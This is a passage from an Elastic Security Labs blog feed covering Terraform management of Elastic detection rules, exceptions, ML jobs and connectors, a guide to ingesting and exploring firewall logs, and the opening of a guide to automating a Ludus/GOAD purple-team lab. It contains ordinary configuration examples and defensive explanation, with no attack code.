<p><strong>Configuration drift.</strong> Rules, policies, and monitors are created manually through the Kibana UI. Over time, production and staging diverge. No one is sure which version of a detection rule is running where.</p>
</li>
<li>
<p><strong>Buried audit trail.</strong> When a detection rule changes or an exception is added, there's no pull request to review, no commit history to trace, and no rollback path if something breaks. Users need to put in extra effort to access such history.</p>
</li>
</ol>
<p><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform provider</a> solves this by bringing these configurations into the same version-controlled, peer-reviewed workflow that teams already use for infrastructure.</p>
<h2>Security artifacts as code: Detection rules, exceptions, and prebuilt rules</h2>
<p>You can now manage the full lifecycle of Elastic Security detection rules through Terraform.</p>
<h3>Detection rules</h3>
<p>The <code>elasticstack_kibana_security_detection_rule</code> resource lets you define, version, and deploy detection rules in the <a href="https://github.com/hashicorp/hcl">HashiCorp Configuration Language</a> (HCL) format:</p>
<pre><code>resource &quot;elasticstack_kibana_security_detection_rule&quot; &quot;suspicious_admin_logon&quot; {
  name        = &quot;Suspicious Admin Logon Activity&quot;
  type        = &quot;query&quot;
  query       = &quot;event.action:logon AND user.name:admin&quot;
  language    = &quot;kuery&quot;
  enabled     = true
  description = &quot;Detects suspicious admin logon activities&quot;
  severity    = &quot;high&quot;
  risk_score  = 75
  from        = &quot;now-6m&quot;
  to          = &quot;now&quot;
  interval    = &quot;5m&quot;
  tags        = [&quot;security&quot;, &quot;authentication&quot;, &quot;admin&quot;]
}
</code></pre>
<p>This means your detection rules live in Git, undergo code review, and are deployed consistently across environments. No more clicking through the Kibana UI to replicate rules from staging to production.</p>
<p><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Detection rule resource docs</a></p>
<h3>Exception lists and items</h3>
<p>The security-as-code story extends to a full suite of exception management resources:</p>
<ul>
<li><code>elasticstack_kibana_security_exception_list</code> - Create and manage exception lists</li>
<li><code>elasticstack_kibana_security_exception_item</code> - Define individual exception items within a list</li>
<li><code>elasticstack_kibana_security_list</code> and <code>elasticstack_kibana_security_list_item</code> - Manage value lists for IP allowlists, file hashes, and other indicators</li>
<li><code>elasticstack_kibana_security_list_data_streams</code> - Associate lists with specific data streams</li>
</ul>
<p>Here's an example that ties them together - an exception list with items that suppress known false positives for a detection rule:</p>
<pre><code>resource &quot;elasticstack_kibana_security_exception_list&quot; &quot;vuln_scanner_exceptions&quot; {
  list_id        = &quot;vuln-scanner-exceptions&quot;
  name           = &quot;Vulnerability Scanner Exceptions&quot;
  description    = &quot;Suppress alerts from authorized vulnerability scanners&quot;
  type           = &quot;detection&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;security&quot;, &quot;vulnerability-scanning&quot;]
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;nessus_scanner&quot; {
  list_id        = elasticstack_kibana_security_exception_list.vuln_scanner_exceptions.list_id
  item_id        = &quot;nessus-scanner&quot;
  name           = &quot;Nessus Scanner - Authorized&quot;
  description    = &quot;Suppress alerts from authorized Nessus scanner hosts&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;

  entries = [
    {
      type     = &quot;match&quot;
      field    = &quot;source.ip&quot;
      operator = &quot;included&quot;
      value    = &quot;10.0.50.10&quot;
    },
    {
      type     = &quot;match_any&quot;
      field    = &quot;process.name&quot;
      operator = &quot;included&quot;
      values   = [&quot;nessus&quot;, &quot;nessusd&quot;]
    }
  ]

  tags = [&quot;nessus&quot;, &quot;authorized-scanner&quot;]
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;qualys_scanner&quot; {
  list_id        = elasticstack_kibana_security_exception_list.vuln_scanner_exceptions.list_id
  item_id        = &quot;qualys-scanner&quot;
  name           = &quot;Qualys Scanner - Authorized&quot;
  description    = &quot;Suppress alerts from authorized Qualys scanner subnet&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;

  entries = [
    {
      type     = &quot;match&quot;
      field    = &quot;source.ip&quot;
      operator = &quot;included&quot;
      value    = &quot;10.0.51.0/24&quot;
    }
  ]

  tags = [&quot;qualys&quot;, &quot;authorized-scanner&quot;]
}
</code></pre>
<p>The exception list and its items are linked by <code>list_id</code>, so Terraform manages the dependency graph automatically. Adding a new authorized scanner is a one-line PR - no clicking through the Kibana UI, no risk of forgetting which environment got the update.</p>
<h3>Prebuilt security rules</h3>
<p>The <code>elasticstack_kibana_prebuilt_rule</code> resource lets you manage Elastic's prebuilt detection rules via Terraform. This is particularly valuable for organizations that need to track which prebuilt rules are enabled, customize their parameters, and ensure consistent deployment across environments.</p>
<h2>ML anomaly detection as code</h2>
<p>Machine learning anomaly detection is one of Elasticsearch's most powerful capabilities - but managing ML jobs across environments has traditionally been a manual process. You create a job in the Kibana UI, tune the detectors, configure the datafeed, and hope someone documents the settings so they can be replicated in the next environment.</p>
<p>The <code>elasticstack_elasticsearch_ml_anomaly_detection_job</code> resource changes that. You can now define the full configuration of an anomaly detection job in HCL - detectors, bucket spans, influencers, data feeds, and analysis limits - and deploy it consistently across dev, staging, and production.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_ml_anomaly_detection_job&quot; &quot;cpu_anomalies&quot; {
  job_id      = &quot;high-cpu-by-host&quot;
  description = &quot;Detect unusual CPU usage patterns&quot;

  analysis_config = {
    bucket_span = &quot;15m&quot;
    detectors   = [{
      function   = &quot;high_mean&quot;
      field_name = &quot;system.cpu.user_pct&quot;
    }]
    influencers = [&quot;host.name&quot;]
  }

  data_description = {
    time_field = &quot;@timestamp&quot;
  }
}
</code></pre>
<p>This matters for teams that rely on ML to catch infrastructure anomalies, unusual user behavior, or security threats. Instead of manually recreating jobs when spinning up new clusters or recovering from failures, the entire ML configuration lives in version control - reviewable, repeatable, and recoverable.</p>
<h2>Cross-cluster automation with API keys</h2>
<p>For organizations running multiple Elasticsearch clusters, the provider now supports <strong>cluster API keys for cross-cluster search (CCS) and cross-cluster replication (CCR)</strong>. You can create API keys specifically designed for secure cross-cluster communication, enabling end-to-end automation of multi-cluster architectures.</p>
<p>This means you can provision two clusters, configure CCS/CCR between them, and set up the necessary security credentials - all in a single Terraform configuration.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_security_api_key&quot; &quot;ccs_key&quot; {
  name = &quot;cross-cluster-search-key&quot;
  type = &quot;cross_cluster&quot;

  access = {
    search = [{
      names = [&quot;logs-*&quot;, &quot;metrics-*&quot;]
    }]
    replication = [{
      names = [&quot;archive-*&quot;]
    }]
  }

  expiration = &quot;90d&quot;

  metadata = jsonencode({
    environment = &quot;production&quot;
    purpose     = &quot;ccs-ccr-between-prod-clusters&quot;
    team        = &quot;platform&quot;
  })
}
</code></pre>
<p>When the <code>type</code> is set to <code>cross_cluster</code>, the API key is scoped to CCS/CCR operations. You define which index patterns are accessible for search and replication, set an expiration policy, and tag the key with metadata - all reviewable in a pull request.</p>
<p>Learn more about <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/elasticsearch_security_api_key">API key resources</a> in the documentation.</p>
<h2>AI connectors as code</h2>
<p>The provider now supports <code>.bedrock</code> and <code>.gen-ai</code> connectors, bringing AI infrastructure into your Terraform workflows. As teams increasingly integrate large language models into their Elastic workflows - for AI assistants, attack discovery, and automated investigations - managing these connector configurations as code becomes essential.</p>
<pre><code>resource &quot;elasticstack_kibana_action_connector&quot; &quot;bedrock&quot; {
  name              = &quot;aws-bedrock&quot;
  connector_type_id = &quot;.bedrock&quot;
  config = jsonencode({
    apiUrl       = &quot;https://bedrock-runtime.us-east-1.amazonaws.com&quot;
    defaultModel = &quot;anthropic.claude-v2&quot;
  })
  secrets = jsonencode({
    accessKey = var.aws_access_key
    secret    = var.aws_secret_key
  })
}

resource &quot;elasticstack_kibana_action_connector&quot; &quot;openai&quot; {
  name              = &quot;openai&quot;
  connector_type_id = &quot;.gen-ai&quot;
  config = jsonencode({
    apiProvider  = &quot;OpenAI&quot;
    apiUrl       = &quot;https://api.openai.com/v1/chat/completions&quot;
    defaultModel = &quot;gpt-4&quot;
  })
  secrets = jsonencode({
    apiKey = var.openai_api_key
  })
}
</code></pre>
<p>With these connectors defined in Terraform, you can version your AI integration configuration alongside the rest of your Elastic infrastructure - and swap models or providers through a simple PR.</p>
<h2>Observability enhancements</h2>
<h3>Synthetics monitors</h3>
<p>The <code>elasticstack_kibana_synthetics_monitor</code> resource now includes a <code>labels</code> field, enabling better organization and filtering of synthetic checks. Labels let you tag monitors by team, environment, or service, making it easier to manage synthetic monitoring at scale.</p>
<h2>Additional platform improvements</h2>
<p>Recent releases also included several resources and attributes that round out the provider's coverage:</p>
<ul>
<li><code>elasticstack_elasticsearch_alias</code> - Manage Elasticsearch aliases as a dedicated resource</li>
<li><code>elasticstack_kibana_default_data_view</code> - Set the default data view for a Kibana space</li>
<li><code>solution</code> attribute on <code>elasticstack_kibana_space</code> - Configure the solution type for Kibana spaces (available from 8.16)</li>
<li>Fleet agent policy enhancements - <code>host_name_format</code> for configuring hostname vs. FQDN, and <code>required_versions</code> for version pinning</li>
</ul>
<h2>Getting started</h2>
<p>If you're already using the Elastic Stack Terraform provider, upgrade to the latest provider version to get all of these capabilities:</p>
<pre><code>terraform {
  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;~&gt; 0.14&quot;
    }
  }
}
</code></pre>
<p>If you're new to managing your Elastic Stack with Terraform, start with the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">provider documentation</a> on the Terraform registry.</p>
<p>To start using Elastic Cloud today, log in to the <a href="https://cloud.elastic.co/">Elastic Cloud console</a> or sign up for a <a href="https://cloud.elastic.co/registration">free trial</a>.<br />
For the full set of changes, check out the <a href="https://github.com/elastic/terraform-provider-elasticstack/releases">release notes on GitHub</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/manage-elastic-with-terraform/manage-elastic-with-terraform.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Make The Most of Network Firewall Logs with Elastic Security]]></title>
            <link>https://www.elastic.co/kr/security-labs/make-the-most-of-network-firewall-logs-with-elastic</link>
            <guid>make-the-most-of-network-firewall-logs-with-elastic</guid>
            <pubDate>Wed, 25 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Make the most of your firewall logs. In Part 1 of our series, learn how to ingest and parse logs from any firewall with Elastic Agent and use the Network Page to visually explore your network traffic for instant insights.]]></description>
            <content:encoded><![CDATA[<p><em>This is Part 1 of a two-part series on leveraging firewall data in Elastic Security. In this post, we cover the fundamentals of firewall logs, how to collect them, and how to begin exploring your network data visually.</em></p>
<p>The network firewall is one of the most critical security controls in a network. It enforces security policies by inspecting and controlling traffic between network segments, while generating logs that record allowed and denied connections. This article explores why firewall logs are a valuable supplement to other data sources, such as endpoint telemetry, and provides an overview of what firewall logs contain and how security teams can use them effectively.</p>
<p>We will cover:</p>
<ul>
<li>The importance of network firewall logs</li>
<li>What’s inside network firewall logs &amp; how those data help cybersecurity</li>
<li>Collecting network firewall logs with Elastic agent</li>
<li>Exploring your data on the Elastic Security Network Page</li>
</ul>
<h2>The Importance of Network Firewall Logs</h2>
<p>A network firewall acts as a gatekeeper, filtering traffic based on organizational rules and policies. For instance, it might permit one system to use RDP to connect to another while blocking similar access from other systems. In cloud environments, virtual firewalls enforce security group rules, network ACLs, and policy boundaries across VPCs, subnets, and regions thus, offering visibility into east-west and north-south traffic across your cloud estate.</p>
<p>Modern Firewalls go beyond traditional filtering by incorporating deep packet inspection, application awareness, and threat intelligence, among others.</p>
<p>Positioned strategically, firewalls capture logs that provide insights into inter-zone and intra-zone communication. For instance:</p>
<ul>
<li><strong>North-south traffic</strong> is data movement between an internal network and external entities like the Internet or cloud services. It is typically monitored by firewalls and security controls to prevent external threats.</li>
<li><strong>East-west traffic</strong> refers to communication within a network, such as between servers, endpoints, or applications inside an organization. It is crucial for internal operations and requires lateral movement detection for security.</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/make-the-most-of-network-firewall-logs-with-elastic/image2.png" alt="A classic setup of firewalls in a corporate environment" /></p>
<p>By analyzing these logs, security teams gain critical insights into traffic patterns, rule enforcement, and potential threats.</p>
<h2>What's to Look Out for in Network Firewall Logs?</h2>
<p>Firewall logs contain detailed records of network activity and are packed with information useful for tracking, monitoring, and analyzing traffic patterns, in addition to identifying security events and potential threats. These logs are related to packet filtering and traffic control, capturing allowed and denied traffic, NAT translations, and access control decisions.</p>
<p>The following is a list of key fields that provide the &quot;ground truth&quot; for your network. Please note that the parenthesis contain the equivalent ECS fields.</p>
<ul>
<li>
<p><strong>Timestamp (<em>@timestamp</em>):</strong> This is the chronological anchor of firewall logs. It helps analysts correlate sequences of events across different devices and networks. For example, if an analyst identifies a suspicious connection, they can trace back the actions preceding or following it to build a precise incident timeline.</p>
</li>
<li>
<p><strong>Source and Destination IP (<em>source.ip, destination.ip</em>):</strong> These identify the origin and target of the traffic. While seemingly simple, directionality is a critical distinction in firewall rulesets. Source IPs help identify malicious external origins or internal systems attempting brute-force attacks, while destination IPs help flag when high-value assets, such as a sensitive database, are being targeted.</p>
</li>
<li>
<p><strong>Source and Destination Port (<em>source.port, destination.port</em>):</strong> Attackers often target specific services. While source ports are often dynamic, destination ports tell you what service is being probed. High-frequency connections to common services (like 80/HTTP or 443/HTTPS) or high-risk ports (like 22/SSH) can be the first indicator of unauthorized access or web-based attacks.</p>
</li>
<li>
<p><strong>Protocol (<em>network.transport</em>):</strong> Analyzing usage of protocols like TCP, UDP, or ICMP helps identify specific attack types. For instance, unusual ICMP patterns might signal a ping sweep or a denial-of-service (DoS) attempt.</p>
</li>
<li>
<p><strong>Action and Rule Identifiers (<em>event.action or event.outcome, rule.name or rule.id</em>):</strong> Understanding whether a firewall allowed or blocked a connection is vital. By identifying the specific <strong>Rule Identifier</strong>, analysts can see which policy was responsible. This is essential for finding misconfigured rules that might be unintentionally exposing the network to attacks.</p>
</li>
<li>
<p><strong>Traffic Volume (<em>source.bytes, destination.bytes, network.bytes</em>):</strong> These fields are primary indicators for data exfiltration. Sudden spikes in volume or large transfers to an external destination are often the &quot;early warning&quot; for data theft or malware beaconing.</p>
</li>
<li>
<p><strong>NAT Info (<em>source.nat.ip, destination.nat.ip</em>):</strong> In complex environments where Network Address Translation (NAT) is involved, these fields are crucial for &quot;unmasking&quot; the actual internal systems involved. Without this, tracing a suspicious connection back to a specific internal host can be nearly impossible. This is key especially for north-south type of traffic.</p>
</li>
<li>
<p><strong>Application Info (<em>network.application</em>):</strong> Next-Generation Firewalls (NGFWs) go beyond ports to identify the actual application (e.g., Skype, BitTorrent, or HTTP). This allows analysts to detect unauthorized applications that might be masking their traffic on standard ports, signaling potential insider threats, lateral movement, or the use of high-risk peer-to-peer software.</p>
</li>
<li>
<p><strong>Interface Info (<em>observer.ingress.interface.name, observer.egress.interface.name</em>):</strong> Knowing which physical or virtual interface the traffic passed through (e.g., WAN vs. LAN) helps analysts understand which network segments are involved. Traffic crossing internal interfaces is a key indicator of malware propagation or lateral movement.</p>
</li>
</ul>
<p><strong>Note</strong>: Some <a href="https://www.elastic.co/kr/docs/reference/integrations">integrations</a> might have these fields labeled differently.</p>
<h2>Collecting firewall logs with Elastic Security</h2>
<p>Elastic makes it easy to collect network firewall logs. This guide describes how to use Elastic Agent and Fleet for firewall log collection. There are other ways Elastic can allow you to collect network logs, such as using <a href="https://www.elastic.co/kr/logstash">Logstash</a>. In cloud environments, you can also ingest logs directly from object storage (like AWS S3 or Azure Blob). This approach is useful for environments where firewalls log to a centralized store rather than stream data directly.</p>
<p>To effectively collect and analyze network firewall logs using Elastic Security, follow these steps:</p>
<ol>
<li><strong>Configure Log Forwarding:</strong> Set up your firewall to forward logs to Elastic Agent.</li>
<li><strong>Syslog Configuration (or similar):</strong> Typically, you will direct your firewall to send Syslog data to the host that has the Elastic Agent, specifying the appropriate IP address and port.</li>
<li><strong>Elastic Agent Setup:</strong> Install and configure Elastic Agent on a syslog server, edge server, or similar log collector to receive and process the logs.</li>
<li><strong>Utilize the relevant Elastic Integrations:</strong> Elastic offers integrations tailored for various firewalls, such as:
<ul>
<li>Palo Alto Next-Gen firewall</li>
<li>Fortinet FortiGate firewall</li>
<li>Check Point</li>
<li>Cisco ASA</li>
<li>AWS Network Firewall</li>
<li>Azure Firewall</li>
<li>GCP Firewall, among others.</li>
</ul>
</li>
<li><strong>Ingest Logs into Elastic Security:</strong> Ensure that the logs are ingested into Elasticsearch, making them accessible in Elastic Security for analysis and visualization. Elastic also enriches ingested firewall logs with helpful context such as geolocation, IP-to-hostname mapping, threat intelligence matches, and even business metadata making investigations faster and more informed.</li>
</ol>
<p>By following these steps, you can effectively collect, process, and analyze network firewall logs within Elastic.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/make-the-most-of-network-firewall-logs-with-elastic/image3.png" alt="An example out-of-the-box dashboard for Fortinet’s Fortigate firewall logs" /></p>
<h2>Exploring Your Data: The Elastic Security Network Page</h2>
<p>Once your firewall logs are flowing into Elastic, you can move from collection to exploration. The <a href="https://www.elastic.co/kr/docs/solutions/security/explore/network-page">Network Page</a> in Elastic Security is your central hub for visualizing and investigating aggregated network data, including firewall data.</p>
<p>Instead of just looking at raw logs, this page provides key network activity metrics in an interactive map and a series of data tables.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/make-the-most-of-network-firewall-logs-with-elastic/image1.png" alt="Aggregated network data" /></p>
<p>Key features of the Network page include:</p>
<ul>
<li><strong>Interactive Map:</strong> Get an immediate visual overview of your network traffic. You can see source and destination points mapped geographically, helping you instantly spot unusual connections, like an internal server communicating with an IP in a country you don't do business with.</li>
<li><strong>Drill-down Widgets:</strong> Interactive widgets allow you to quickly find baselines and outliers. You can see top talkers for:
<ul>
<li>Network Events</li>
<li>DNS Queries</li>
<li>TLS Handshakes</li>
<li>Unique Private IPs</li>
</ul>
</li>
<li><strong>Focused Data Tabs:</strong> The page includes tabs to pivot your investigation into specific data types, such as:
<ul>
<li><strong>Flows:</strong> See source and destination IP addresses and countries.</li>
<li><strong>DNS:</strong> Analyze all DNS network queries.</li>
<li><strong>HTTP:</strong> Inspect received HTTP requests.</li>
<li><strong>TLS:</strong> Investigate handshake details.</li>
</ul>
</li>
<li><strong>Timeline Integration:</strong> You can drag and drop items of interest—like a suspicious IP address or host name—directly from the Network page into Timeline for deeper investigation and correlation.</li>
</ul>
<p>Using this page, you can start to answer foundational questions like, &quot;What is normal traffic for my network?&quot; and &quot;Which external IPs are my internal hosts communicating with most?&quot; This visual exploration is the first step before moving into automated detection.</p>
<h2>Start Exploring Your Network Data</h2>
<p>In this post, we've covered the fundamentals: why firewall logs are critical, what's inside them, how to ingest them using Elastic Agent, and how to begin visually exploring that data on the Network page.</p>
<p>In Part 2, we'll build on this foundation and move from <em>exploration</em> to <em>active threat detection</em>. We will cover how to use Elastic Security’s detection rules to automatically find network-native threats like reconnaissance, C2, and data exfiltration, as well as how to hunt for advanced lateral movement by correlating with other data such as endpoint data and other telemetry.</p>
<p>Ready to turn your own firewall logs into actionable insights?</p>
<ul>
<li><strong>New to Elastic?</strong> Start your <a href="https://www.elastic.co/kr/cloud/elasticsearch-service/signup">free 14-day trial of Elastic Cloud</a> to see the Network Page in action.</li>
<li><strong>Already an Elastic user?</strong> Head to the <strong>Integrations</strong> app in Kibana, add your firewall's integration, and start exploring your network data today.</li>
</ul>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/make-the-most-of-network-firewall-logs-with-elastic/Security Labs Images 15.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Automating GOAD and Live Malware Labs]]></title>
            <link>https://www.elastic.co/kr/security-labs/automating-goad-and-live-malware-labs</link>
            <guid>automating-goad-and-live-malware-labs</guid>
            <pubDate>Thu, 05 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Stop building labs by hand. Automate the deployment of a fully instrumented Purple Team range using Ludus and Elastic Security. Spin up infrastructure, execute attacks, and validate detection rules in a single, repeatable workflow.]]></description>
            <content:encoded><![CDATA[<h2><strong>Introduction: The Need for a Scalable, Automated Simulation Range</strong></h2>
<p>In modern security operations, detection engineering is no longer a “set it and forget it” discipline. The central challenge for any security team – and the question that underpins the entire purple-team approach is simple: <em>how do you know whether your detection rules genuinely work?</em> Continually validating detection logic against an ever-shifting adversary toolkit is now a fundamental requirement.</p>
<p>Arguably, the largest hurdle for this exercise has always been setting up the lab. Manually provisioning a multi-domain Active Directory forest, configuring it with specific vulnerabilities, and deploying a separate, contained malware analysis environment is a complex and time-consuming process. This repetitive setup work is a significant drain on an organization's most valuable resource: the time of its senior security analysts. Community discussions echo this frustration, highlighting the hours lost to manual setup before a single test can be run.</p>
<p>This blog details a modern solution that eliminates this bottleneck by combining rapid infrastructure automation with a unified security analytics platform. The solution leverages two key components:</p>
<ol>
<li><a href="https://ludus.cloud/"><strong>Ludus</strong></a><strong>:</strong> An open-source automation overlay that deploys and configures complex, multi-VM cyber ranges from a single command.</li>
<li><a href="https://www.elastic.co/kr/security"><strong>Elastic Security</strong></a><strong>:</strong> The platform that unifies Security Information Event Management (SIEM), eXtended Detection and Response (XDR), and cloud security, providing a consolidated solution to ingest, detect, and respond to threats. It offers the &quot;limitless visibility&quot; required to observe every action within the simulated environment.</li>
</ol>
<p>The goal of this guide is to provide a definitive, step-by-step blueprint for building this integrated system. It will show how to move from slow, manual, and inconsistent lab testing to a continuous, automated, and scalable detection-engineering workflow beyond what <a href="https://github.com/elastic/cortado">Elastic Cortado</a> provides.</p>
<h2><strong>The Solution Architecture: Ludus + Elastic</strong></h2>
<p>This architecture represents a high-fidelity simulation of a modern hybrid enterprise. The Ludus range acts as the &quot;on-prem&quot; or IaaS data center, while the Elastic Cloud deployment represents the &quot;SaaS&quot; security stack. This model perfectly mirrors the hybrid and multi-cloud environments that Elastic Security is designed to protect, making the <em>architecture</em> of the test as valuable as the attacks themselves.</p>
<p>The build consists of the following core components.</p>
<table>
<thead>
<tr>
<th align="left">Component</th>
<th></th>
<th align="left">Technology</th>
<th align="left">Function</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Foundation (<strong>Infrastructure</strong>)</strong></td>
<td></td>
<td align="left"><strong>Ludus</strong> (Proxmox/Ansible)</td>
<td align="left">Deploys VM ranges from a single YAML config.</td>
</tr>
<tr>
<td align="left"><strong>Targets</strong></td>
<td></td>
<td align="left"><strong>Identity - GOAD</strong> (Windows Server) <strong>Supply Chain - XZbot</strong> (Debian)</td>
<td align="left">Multi-domain AD forest with intentional vulnerabilities (Kerberoasting, Print Nightmare). Linux host infected with CVE-2024-3094 for supply chain simulation.</td>
</tr>
<tr>
<td align="left"></td>
<td></td>
<td align="left"></td>
<td align="left"></td>
</tr>
<tr>
<td align="left"><strong>The Sensor Grid (<strong>Visibility</strong>)</strong></td>
<td></td>
<td align="left"><strong>Elastic Agent</strong></td>
<td align="left">Unified telemetry collection (EDR + Logs).</td>
</tr>
<tr>
<td align="left"><strong>The Brain (<strong>Analysis</strong>)</strong></td>
<td></td>
<td align="left"><strong>Elastic Security</strong></td>
<td align="left">SIEM/XDR platform for correlation and AI-driven investigation.</td>
</tr>
</tbody>
</table>
<h3><strong>Component 1: The Foundation (Ludus)</strong></h3>
<p>Ludus serves as the Infrastructure-as-a-Service (IaaS) layer. Built to run on Proxmox 8/9 or Debian 12/13, it uses YAML configuration files to define complex virtual networks, supporting up to 255 distinct VLANs. Behind the scenes, Ludus easily leverages Packer and Ansible to build, configure, and deploy the virtual machine templates from that single file.<br />
Review and follow the installation steps and hardware requirements in the Ludus <a href="https://docs.ludus.cloud/docs/quick-start/install-ludus">quick-start</a>.</p>
<h3><strong>Component 2: The Targets (The Labs)</strong></h3>
<p>This guide merges two distinct Ludus environments into a single, comprehensive range to test a wider spectrum of threats:</p>
<ul>
<li><a href="https://github.com/Orange-Cyberdefense/GOAD"><strong>Game of Active Directory (GOAD)</strong></a><strong>:</strong> A purpose-built Active Directory lab designed by security researchers at <a href="https://www.orangecyberdefense.com/">Orange Cyberdefense</a>. It is pre-configured with the specific misconfigurations and vulnerabilities needed to simulate common identity-based attack paths, such as Kerberoasting, NTLM Relay, and Active Directory Certificate Services (ADCS) abuse.</li>
<li><a href="https://docs.ludus.cloud/docs/environment-guides/malware-lab"><strong>XZbot Malware Lab</strong></a><strong>:</strong> A high-risk, high-fidelity malware environment. This lab contains the <em>actual, functional</em> CVE-2024-3094 backdoor. This provides a perfect, modern test case for a sophisticated software supply-chain attack.</li>
</ul>
<h4>Important Disclaimer</h4>
<p>Handling live malware, even for research, can violate Acceptable Use Policies (AUPs) of ISPs or cloud providers. Ensure you own the infrastructure (Ludus is on-prem) and ensure your upstream ISP allows for such research, or route traffic through a VPN.</p>
<h3><strong>Component 3: The Sensor Grid (Elastic Agent &amp; Defend)</strong></h3>
<p>To gain visibility, every virtual machine in the Ludus range across both GOAD and XZbot labs will be instrumented with <strong>Elastic Agent</strong>, a single, unified agent for data collection and protection (via Elastic Defend).</p>
<p>This instrumentation is automated via the <a href="https://github.com/badsectorlabs/ludus_elastic_agent"><em>badsectorlabs/ludus_elastic_agent</em></a> Ansible role. This role is the critical lynchpin that programmatically bridges the infrastructure provisioning phase (Ludus/Ansible) with the security instrumentation phase (Elastic), enabling a true &quot;infrastructure-as-code&quot; workflow.</p>
<p>Crucially, the Elastic Agent policy will be configured with the <strong>Elastic Defend</strong> integration. This elevates the agent from a simple log collector to a full-powered Endpoint Detection &amp; Response (EDR)/eXtended Detection &amp; Response (XDR) solution, providing host-based detections (including Machine Learning (ML) driven malware and ransomware detection) and the deep, kernel-level telemetry essential for detection.</p>
<p><em>Note: For the purple team approach outlined in this blog, set policies to <strong>Detect</strong> mode.</em></p>
<h3><strong>Component 4: The Brain (Elastic Cloud Hosted / Elastic Serverless)</strong></h3>
<p>All security telemetry and alerts from the Elastic Agents in the Ludus range are streamed to a centralized <strong>Elastic Cloud Hosted (ECH)</strong> or <strong>Elastic Serverless</strong> deployment. This is where the unified platform's analytical power comes to life. Using a cloud-native platform is not just for hosting; it is what unlocks Elastic's most advanced, force-multiplying features, including <strong>Attack Discovery</strong> and the <strong>AI Assistant</strong>. <a href="https://cloud.elastic.co/registration">Click here to start a trial on Elastic Cloud</a>.</p>
<p>The diagram below provides an overview of the build, which is based on the <a href="https://github.com/Orange-Cyberdefense/GOAD">GOAD lab</a>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image8.png" alt="" /></p>
<h2><strong>Phase 1: Building and Instrumenting the Range</strong></h2>
<p>This section provides a technical, step-by-step guide to configuring and deploying the automated range. The process follows a clear &quot;infrastructure-as-code&quot; (IaC) model, where the security instrumentation is defined alongside the infrastructure itself, ensuring a consistent and repeatable monitoring posture for every deployment. The Elastic Cloud instance and its configurations can be managed with the <a href="https://registry.terraform.io/providers/elastic/ec/latest/docs">Elastic Cloud</a> and <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack</a> Terraform provider for a full IaC model of the range and the SIEM.</p>
<h3><strong>3.1 Configuring the Elastic Agent Policy (in Kibana)</strong></h3>
<p>Before running the Ludus range deployment, the agent policy must be created in the Elastic Cloud instance. This policy is what enables the powerful EDR/XDR telemetry.</p>
<p>The operational flow is as follows:</p>
<ol>
<li>Log in to the Elastic Cloud (ECH) or Elastic Serverless Kibana instance.</li>
<li>Navigate to <strong>Management &gt; Fleet</strong>.</li>
<li><a href="https://www.elastic.co/kr/docs/reference/fleet/agent-policy#create-a-policy">Create a new <strong>Agent policy</strong></a> (e.g., &quot;ludus-range-policy&quot;). <em>The ludus_elastic_agent role will enroll agents into the policy you specify in your VM-level customization or into the default policy linked to the global variable.</em></li>
<li><a href="https://www.elastic.co/kr/docs/reference/fleet/agent-policy#add-integration">Add the <strong>Elastic Defend</strong> integration</a> to this policy.</li>
<li><a href="https://www.elastic.co/kr/docs/solutions/security/configure-elastic-defend/configure-an-integration-policy-for-elastic-defend">Configure the Elastic Defend integration</a> to run in <strong>Detect</strong> mode. This activates the full suite of EDR telemetries.</li>
<li>Save the policy and click &quot;Add agent.&quot; This will provide the <strong>Enrollment token</strong> (for ludus_elastic_enrollment_token) and <strong>Fleet server URL</strong> (for ludus_elastic_fleet_server) needed for the ludus.yml file.</li>
<li>(<em><strong>Optional</strong></em>) Repeat steps 3-6 to create customized policies to align with the host’s functions and capabilities for VM-level customization of policies.</li>
</ol>
<p>Once this policy is created and the token is pasted into the ludus.yml file, running Ludus range deploy will execute the full, automated workflow. Ludus provisions the VMs, and Ansible installs the Elastic Agent, which then enrolls in Fleet and automatically pulls down the policy containing the Elastic Defend integration. This provides the rich EDR telemetry - kernel-level process, file, network, and registry events - from the moment the lab is born.</p>
<h3><strong>3.2 The Ludus YAML Configuration (ludus.yml)</strong></h3>
<p>Ludus provides the steps to deploy the GOAD range <a href="https://docs.ludus.cloud/docs/environment-guides/goad">here</a>. The configuration for the range is stored in the ludus.yml configuration file. For the GOAD range, it is located in <code>ad/GOAD/providers/ludus/config.yml</code>.<br />
The full configuration in the appendix is an example based on a sample running configuration that merges a full GOAD lab (on VLAN 10) with the XZbot lab (on VLAN 20).</p>
<p>To deploy a customized version during installation, update the <code>ad/GOAD/providers/ludus/config.yml</code> file before running the <code>goad.sh</code> script in <a href="https://docs.ludus.cloud/docs/environment-guides/goad#2-on-the-ludus-host-clone-and-setup-the-goad-project">step 2</a>.</p>
